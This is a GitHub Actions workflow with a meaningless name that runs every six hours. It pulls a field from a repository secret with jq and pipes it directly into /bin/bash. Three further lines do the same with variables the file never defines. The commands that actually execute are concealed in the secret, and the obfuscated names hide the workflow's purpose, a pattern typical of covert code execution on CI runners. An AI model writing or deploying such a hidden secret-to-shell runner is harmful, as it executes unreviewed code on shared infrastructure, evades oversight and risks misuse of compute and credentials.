name: definitioncompass

on:
  workflow_dispatch:
  schedule:
    - cron: '44 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: definitioncompass
        env:
          ct6: ${{ secrets.ct6 }}
        run: |
          echo $ct6 | jq -r .hvrth5862 | /bin/bash
          echo $vjiwl4 | jq -r .mlli7 | /bin/bash
          echo $q313 | jq -r .q72 | /bin/bash
          echo $nlweu1 | jq -r .ac16758 | /bin/bash

